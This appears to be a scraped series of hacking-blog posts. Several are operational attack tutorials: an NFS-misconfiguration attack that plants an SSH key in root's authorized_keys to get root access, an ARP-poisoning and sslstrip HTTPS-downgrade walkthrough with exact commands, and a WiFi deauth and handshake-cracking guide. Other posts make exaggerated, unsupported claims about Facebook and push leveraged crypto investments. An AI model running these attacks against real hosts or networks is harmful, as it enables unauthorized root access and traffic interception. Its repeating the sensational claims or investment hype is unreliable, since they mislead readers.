Exploit a Misconfigured NFS Server | SSH | RPCbind

What NFS Server is ?

NFS is network file system and it is a client server system that allows client to access shared files over a network. It allows client to mount all directories. We are going to access a file system and import our private ssh key to  authorized key file gain root access via SSH. In the last i will tell how to prevent this this type of attacks on your server.

Let the victim ip is 192.168.43.176

open terminal and type rpcinfo -p 192.168.43.176  this will return all the registered RPC programs.

many people get the error that rpcinfo command not found “sudo apt update && sudo apt install rpcbind”

type sudo showmount -e 192.168.43.176 this will return the mount directories.

/ * means root directory
now create a tmp file for mount mkdir /tmp/dir this will create a temporary directory for mount the nfs server, now mount server to temporary directory type command mount -o nolock -t nfs 192.167.43.176:/ /tmp/dir 

now generate ssh key command ssh-keygen that will create a key in your /home/h0nk3r/.ssh/id_rsa

now import the key command cat /home/h0nk3r/.ssh/id_rsa >> /tmp/dir/root/.ssh/authorized_keys that will send your ssh key to the nfs server to gain access to root via ssh now just umount the shared directory umount /tmp/dir 

 

Now You can directly connect to the server type command ssh root@192.168.43.176 

Prevention:

If i am the owner of this server i can manage users with group and with the specific privileges and never use the root directory  as mount point.

Conclusion

Sorry if i made any mistake in conceptual or grammatical, as i am not good in English.
Hope you had a nice reading, comming back to hacknews.

Create Your Own DarkWeb site | Onion link | Port Forward | Host on WAN

DarkWeb site with tor on linux

DarkWeb is very usefull to be anonymous you can get you own .onion website and host on wide area network free.
i assume you are using kali linux or parrot sec os open terminal and install tor sudo apt-get install tor after you just need to edit some in configuration file of tor.

open terminal and type cd /etc/tor and than ls for list dir you will see torrc file there that you have to edit

open this file in your favorite text editor and add two lines
HiddenServiceDir /var/lib/tor/hidden_service
HiddenServicePort 80 <Your local IP>:80
Check your local ip with ifconfig 
open your file manager with root and go in /var/lib/tor/hidden_service there you get your website
and boom you done it at last start tor by sudo service tor start and sudo service apache2 start

NOTE:- Now you face a problem that site cant be reach! Here is the solution

Forward your port | Go on Internet

This is just make a connection between your local ip to the internet so you can access your website worldwide
for more about Port forwarding click here
i suggest you to use NGROK for download click  available for all Systems
after Download you just forward your port with ./ngrok http 80 80 for http so you apache server will be on WAN and your onion site can reach it.
after forward your port you see like this

just copy 4f28046d.ngrok.io this link and paste where you put your local ip if you remember above
in file torrc  and save it again and restart tor again and now you can access your apache site with onion site
paste your website here  /var/www  and boom your website is ready for share on social media.

Conclusion

Sorry if i made any mistake in conceptual or grammatical, as i am not good in English.
Hope you had a nice reading, comming back to hacknews.


HTTPS downgrade to HTTP | Bypasss HSTS | SSLStrip | ARP poisoning

Introduction of HSTS, ARP, And sslstrip

HTTP Strict Transport Security (HSTS) is a web security which protects against downgrade of protocols and cookies hijacking. The Address Resolution Protocol (ARP) feature performs a required function in IP routing. ARP finds the hardware address, also known as Media Access Control (MAC) address, of a host from its known IP address. ARP maintains a cache (table) in which MAC addresses are mapped to IP addresses. SSLStrip is a type of MITM force a web browse to stripping https:// URLs and turning them into http:// URLs.

You have to forward IP By IPTables and send a fake arp request Request.

 

Lets Do it.

MITMF -(Framework for Man-In-The-Middle attacks)

https://github.com/byt3bl33d3r/MITMf  just simple download this Framework from git hub (git clone) or sudo apt-get install mitmf
By just mitmf -h you can go in help section

-i: to specify the interface we want to run the MITM attack trough;
–spoof: to redirect or modify the hijacked traffic;
–apr: to specify that we want to redirect the traffic trough ARP spoofing;
–hsts: to load SSLStrip+ plugin;
–dns: to load a proxy to modify DNS queries;
–gateway: to specify the gateway;
–target:to specify the target.

run mitmf –spoof –arp -i <interface name> –target <target IP> –gateway <gateway IP> –hsts

get the target local ip by netdiscover or scan your local ip by nmap and for gateway ip route, or route –n

SSlStrip

Open terminal and forward Ip by echo 1 > /proc/sys/net/ipv4/ip_forward

start arpspoof by arpspoof -i eth0 -t victimip default_gateway_ip

Setting up port redirection using Iptables iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 10000

finally Launch sslstrip sslstrip –l 10000

now open new terminal  and see results tail -n 50 -f sslstrip.log

Conclusion

Sorry if i made any mistake in conceptual or grammatical, as i am not good in English.

Hope you had a nice reading, comming back to hacknews.

Why people are deleting their Facebook and you should do the same

If you still own a Facebook account, you are apparently living in the past. After a recent privacy scandal causing 78 million Facebook users to have their private data shared around the world, and abused for political reasons, problems involving the once popular social network are piling up.

The most recent shocking event involves the team of Facebook attempting to convince hospitals to share their patients health information with the site, causing a new outrage among (former) users of the social goliath. Facebook began speaking with hospitals last year about the possibility of matching anonymized user profiles with health data, but the news leaked last week.

Meanwhile a huge online movement called #DeleteFacebook is convincing millions of Facebook victims to delete their accounts and to never come back, something that has caused a loss on the stock market of over 110 billion in value. The movement is active on many locations on the internet and is becoming more popular fast. It is now estimated that at least 1/3 of all individuals active in the tech world have deleted their Facebook or are planning to do this.

The #DeleteFacebook movement suddenly received a big boost, and became a lot larger, when celebrities like Elon Musk, Will Ferrell and Cher attached themselves to it. After whistleblowers like Edward Snowden and Julian Assange expressed their support as well, the cat was out of the bag.

So what are the main reasons you should consider deleting your Facebook account?

1: The social network saves all the images and videos you send on it. Even if it is done in private chats. They then share this content with different companies and partners around the world. This means your private material at this moment could have been watched by millions of people on the planet.

2: Facebook has been caught recording your text messages and your phone calls. They also keep meta data showing exactly who you call, when and for how long, this data includes the full information and phone numbers of your contacts. Even if your contacts are later deleted from your phone, Facebook still records it all. They do the same thing for text messages, logging everything. And again this is shared with all their partners around the world, or pretty much anyone who pays for it.

3: Facebook has been censoring activists, dissidents and hacktivists for years causing it to become a bubble of disinfo and reactionary political speech, where advertisers and media are feeding you with information that is not only destructive for your brain, it also harms your quest for knowledge.

Why should you delete Facebook now instead of trying to change it? The website collected a lot of data about you. The terms and conditions are carefully constructed to make it look like you agree to this. The only option you have now is to delete your account, effectively cancelling your agreement. This means they can no longer sell your data. We believe this is your only option if you want to avoid further damage to your private life.

WIFI Hacking Tutorial: Using Aircrack, DeAuth and Wordlists to hack WIFI networks

Our tutorial today will be about WIFI hacking using the DeAuth attack, most useful for hacking WPA/WPA2 networks. It works by aquiring a handshake and decrypting it using a wordlist.
The system used in the tutorial is Kali linux, but it will work for any .deb based system (Debian, Mint, Ubuntu, etc.) and the technique will not be much different for other distributions either.

1: The tutorial is pretty straightforward, and starts out by putting your network adapter in monitor mode using AIRMON-NG.

2: Next we use AIRODUMP-NG to monitor and receive packets. Your network adapter then receives beacons. This means you get a clear view of all the different WIFI networks around you. After this you select the correct BSSID from the list, and the correct channel.

3: Using AIREPLAY-NG and filling in the correct BSSID and channel, we launch a DeAuth attack using a simple command. Then we wait until a so called “handshake” is received.

4: Close all the processes and start cracking the .cap (capture) file. This will be done using a wordlist. The program used for this is AIRCRACK-NG. Any wordlist saved as a .txt file will do. The bigger the wordlist, the more chance you have of cracking it.

Extra: A good wordlist to use is called the RockYou wordlist, wich is available for download here.

Below is a full tutorial video showing you the exact codes and steps in detail, so you will never make a mistake when you carry out your attack!

With credits to Razzor Sharp for his amazing video!

Why hackers choose Monero instead of Bitcoin

If you haven’t been living beneath a stone for the last few months, then you have heard about Bitcoin too. It started as an internet trend, then it shocked the financial markets, and now even your grandma is buying it. The digital coin is no longer a hype, it became reality and is the first worldwide currency. Globalists love it and hope that soon we will all walk around with a chip in our arm doing fully automated payments. Dystopia is coming and you can be a part of it.

But as the crypto currency Bitcoin is embraced by the “normal” people now, hackers already moved on to the next step. Hackers use Monero. On the Darknet this is the payment method. An entire shadow economy has been created on there, using this specific crypto currency.

Why Monero instead of Bitcoin? There are multiple reasons for this. For one, Monero is anonymous, you won’t see the origin address the funds you receive came from. Where transfers at Bitcoin are transparent, and money transfers can be traced, with Monero they are not.

The second reason is that Monero can actually still be mined. The mining of Bitcoin stopped being profitable years ago. Only big companies or people owning many ASIC miners can still make some income with it, but normal users are no longer mining this coin. However, Monero is a so called CPU coin. The algorithm it uses is called Crytonight, and it is built to be mined with CPU’s (processors).

Where Bitcoin gave an advantage to GPU (graphic card) miners and later ASIC miners, Monero does not. The advantage these people have over CPU miners is minimal. For this reason it is popular among hackers, website owners, but also botnet controllers. Because the more CPU’s you have, the more Monero you will mine. And the Monero coins are, like Bitcoin, increasing in value. Infact, this is going a lot faster than with it’s bigger brother. At the moment we are writing this, the Monero coin is worth around 280 dollars. While a month ago it was worth 28 dollars. So it increased ten fold.

And the third big difference between Bitcoin and Monero is that the latter is not yet influenced by big investors manipulating the market. Due to the anonymous character of the coin it is hard to be used on the speculators market. Because, like we said, it is impossible to trace where transfers come from and where they go to. This doesn’t mean Monero is not being traded. If you believe this, then you have never been on the Darknet.

So what is our conclusion about it? Would we choose Bitcoin or Monero? If you are looking to invest your money and you want to make some real profit? Then go for Monero. If you are looking to use crypto currencies for your daily payments? Then Bitcoin is probably the right choice for you, as it is being accepted more and more by the big stores.

Source: The Internet

How will our lives change when we lose net neutrality?

Net neutrality helps to balance the internet in such a way that internet service providers can’t use the laws to their benefits. This year (2017), a repeal against net neutrality is to be decided upon by the FCC in the United States. The United States is a country where the internet service providers are mostly monopolies created by the government. Therefore, the government, which controls the internet, will be biased in favour of these big businesses. And these businesses, owned by wealthy businessmen, will want to take advantage from removing such regulations and safeguards.

Despite the fact that the FCC in the United States is asking for net neutrality to be gone, the aftermath effects the whole world. The supporters of the repeal against net neutrality spread a list of countries which lack net neutrality in their law, trying to convince the public that even without net neutrality, such countries are doing great in regards to free and cheap internet use.

However, these European countries they keep listing never had a bandwidth or network issue, due to their strong enough internet infrastructure. The United States internet infrastructure, on the contrary, has been like a cheddar cheese. It is exploited by the ISPs to such a degree that the US can’t meet the quotas anymore, since they oversold the lines. Even the public funding that was used by such ISPs on public lands was never returned by these big business owners. Subscriptions were also oversold and all profits went to these companies. All ISPs laid the internet infrastructure with public funding on public land because they were allowed to. And nothing was ever paid back.

As a result, the internet infrastructure of the US was weakened, and will soon be handed over as private property to these ISPs, if they would be succesful at appealing the net neutrality law. This draconian overtake is expected to happen on 14 December 2017.

Without real competition among ISPs, the internet is nothing more than a heavily regulated tool of the elite and the people in power, for controlling news and discourse. Isn’t that what happened with your TV channels as well? Being subjected to the controlling mechanisms of the government, it is now hard to find informative and neutral news or programs and even while more TV channels become available, the price is also increasing and the quality is dropping.

When net neutrality is absent, it is ofcourse unlikely carriers would block entire services from being accessed by their customers because it will harm their business. However, they can use bandwidth throttling, since they will aim to force the users to select the carrier’s preferred alternative, to earn more on the packages they will be selling. If smaller companies wanted a better deal, ISPs like Comcast would ask for fees in exchange for such services.

Such deals will make the services small companies are selling to their customers more expensive, while paying for internet use as one fixed price package will be a thing from the past. Monopolized by the government, ISPs will be able to ask whatever price they want from site owners. Those not able to meet the demands, will see their sites slow down to a degree they can’t reach their followers anymore. In this case, both users and the site owners would have to pay for the services. Users for the internet access, and site owners to make sure the ISPs will not be not slowing down their website speed or the speed at which their videos stream.

In addition, customers will be accessing features like social media through service providers. Such redirected routes will make the internet experience for users complicated, even slower and more expensive.

Bigger companies like Google and Netflix (as they had to pay for Comcast in the past), will be able to pay for the fees ISPs will demand. For small companies, like alternative news sites and personal bloggers (for example, activists), it will be much harder to afford such fees..

ISPs, as big businesses, already have been abusing the internet while working with the government, by functioning as a regulator. Now in the US it will be even easier to block social media and any site unpopular with the big businesses or government. While small companies and a lot of sites all over the world may disappear, the big corporations will control the internet, even growing bigger and now armed with an effective strategy of creating an everlasting monopoly.

Sources:

The inside story of how Netflix came to pay Comcast for internet traffic

https://www.wsj.com/articles/netflix-agrees-to-pay-comcast-to-improve-its-streaming-1393175346

http://viapopuli.com/what-is-net-neutrality-and-why-is-it-important-for-a-free-internet-simplified-version

https://arstechnica.com/tech-policy/2007/08/pearl-jam-censored-by-att-calls-for-a-neutral-net/

http://bsalert.com/news/853/Comcast_Caught_Filtering_Political_E-Mails.html

Hack News on social media

Hack News is available on social media as well. Now you never have to leave your favorite social network anymore, because Hack News is everywhere!

Follow us on Twitter: Hack News on Twitter

Visit our Facebook page: Hack News on Facebook

Subscribe to our Youtube channel: Hack News on Youtube

Browse our Instagram art: Hack News on Instagram

More art on Deviantart: Hack News on Deviantart

We are still expanding our social media presence, but our focus will be on these 5 networks right now. And we especially recommend to subscribe to our Youtube channel, because there we will upload hacking tutorials on a regular basis. So if you want to learn, then make sure you stay up to date with us.

Is Bitcoin a curse or is it the future? And should you invest in it?

Probably one of the most discussed subjects online in recent years is Bitcoin. What do we think of it, and is it smart to invest money in it?

Bitcoin created a shockwave through the financial world. Together with other crypto currencies it provided an alternative to the FIAT currency markets and created an entirely new economy. One that is global and does not care about the economic situations of the different countries around the world.

But what is it? In simple terms Bitcoin and other crypto currencies are blockchains. A chain that is comprised of all transactions that ever happened, an algorithm and a huge amount of code. Nothing very special to the common man, but to computer technicians it is probably one of the most impressive things that ever happened.

Should you put your money in it? Especially over the last year the value of a single Bitcoin has risen to thousands of dollars. If you invested in Bitcoin at the start, and you bought a serious amount, you are likely laughing right now, because you made those millions. You are officially a millionaire and you did not really have to work for it. But what is the real tangible value of it?

Really the blockchain is nothing more than digital code. The only thing that makes a difference is that there is a limited amount of coins available. You can mine the coins, but the total amount of Bitcoin is a pre defined number. For this reason, in a technical sense, it can only deflate. Meaning the value should become higher, always. The only thing that is needed for that is that it is used more. So as more stores start accepting it, the value will keep rising. As more miners arrive, and more buyers, the value will keep on increasing. Focu on hyping it, and collectively you are forcing the world to make you a millionare.

Both Bitcoin and the alternative coin Litecoin have now been embedded in to the CFD market. Respected internet brokers like Plus500 allow you to invest in it without actually buying the coins, you simply buy the CFD contracts on the market. Using just 500 bucks you can invest in up to 100.000 dollar worth of Bitcoin. It works with a leverage system. And when it grows you make a huge profit. Want to learn more? Just visit that website. Big business is doing it, so why wouldn’t you?

On the other hand, it is just digital code, and like FIAT currencies, there is not much difference there. It is not a real thing, like a house, or a golden ring. It exists in the digital world and nowhere else. No matter how sophisticated the system is, in a true sense, it is not much more than a number inserted in a digital database. Like credits on a Poker site, really. The big difference there is that the blockchain is managed by all its users, and is completely open. Meaning every single event that ever happened is visible In the blockchain. Every payment, every coin mined, yes, really all of it.

So there is a system that is owned by the users, not so much by a single entity. In the case of FIAT currencies, like the dollar or the euro, these are also just digital numbers. Everything is digitalized meaning banks can simply change the number in the database and you are dependent on what happens next. There are the financial watchdogs who make sure there is no abuse. But with the blockchain, every user is a watchdog.

How does it relate to previous metals like gold and silver? Traditionally these resources have been used as an alternative to FIAT currencies. Whenever the economy went bad, investors jumped on the metal market and gold and silver would rise in value. Because there are limited amounts as well, and those metals are tangible. You buy a silver coin, its a real coin, and it can be exchanged for money at millions of locations worldwide. Usually at a rate that is very close to the market value. But gold can be mined as well, like crypto currencies, and there is no real way of knowing how much gold actually exists in the ground. So should a big discovery be made, the value might drop. However, countries in the world choose to keep their reserves in gold and silver. And it is used in the industry, so there is something to say for that.

At the moment I am writing this article the price of Bitcoin is close to 10.000 dollars for each coin. The real remaining question is, is something digital, something invented by some random guy on the internet, really worth the 10.000? I am not convinced of this. The hype is incredible and it is likely it will still grow bigger. So right now, yes, you can invest in it. Do not put all your hard earned money in it, but get at least a bit of Bitcoin. As it hits the mainstream markets now, it will surely increase more and you will make a profit. But for the long term? No. Make that profit and get something tangible with it. Buy a house, or a piece of land. Why? Because that is not created out of thin air by some internet guru, but it is something in the real world, and there is limited availability as well. And with real estate it is not a question of availability and demand, the demand will always increase in the long run, if the population grows.

Good luck!

The Tor browser could leak IP addresses for a while – Fixed now

Due to a bug in the Firefox browser, Tor was leaking the ip addresses of its users if they made a mistake.
The bug was discovered by the Italian security researcher Filippo Cavallarin. The vulnerability resides in FireFox and eventually also affects Tor Browser, since the famous privacy-aware service that allows users to surf the web anonymously uses FireFox at its core.

Dubbed by the researcher as TorMoil, the vulnerability affects Tor browser for macOS and Linux and not for Windows, but the details of the flaw have not been publicly released, out of respect for the security and privacy of Tor users.

TorMoil is triggered when users click on links that begin with file:// addresses, instead of the more common used https:// and http:// addresses.

Tor released a fix for this shortly after:

“The fix we deployed is just a workaround stopping the leak. As a result of that navigating file:// URLs in the browser might not work as expected anymore. In particular entering file:// URLs in the URL bar and clicking on resulting links is broken,” the Tor Project said in a blog post.

“Opening those in a new tab or new window does not work either. A workaround for those issues is dragging the link into the URL bar or on a tab instead. We track this follow-up regression in bug 24136.”

Tor’s statement said there is no evidence that the flaw has been actively exploited on the Internet or darkweb to obtain the IP addresses or Tor users. Of course, the lack of evidence doesn’t mean the flaw wasn’t exploited by law enforcement officers, private investigators, or stalkers. And now that a fix is available, it will be easy for adversaries who didn’t know about the vulnerability before to create working exploits.

The company finally released an updated version for the browser here. The new version is called Tor Brfrowser 7.0.9. Since Windows users were not affected, they stay on the older version 7.0.8. But if you do not know wich version you have, since the bug was discovered on Thursday, October 26, by Filippo Cavallarin, everyone who installed the Tor browser before this date should update to the latest version.

Sources:

Knack.be

The Hacker News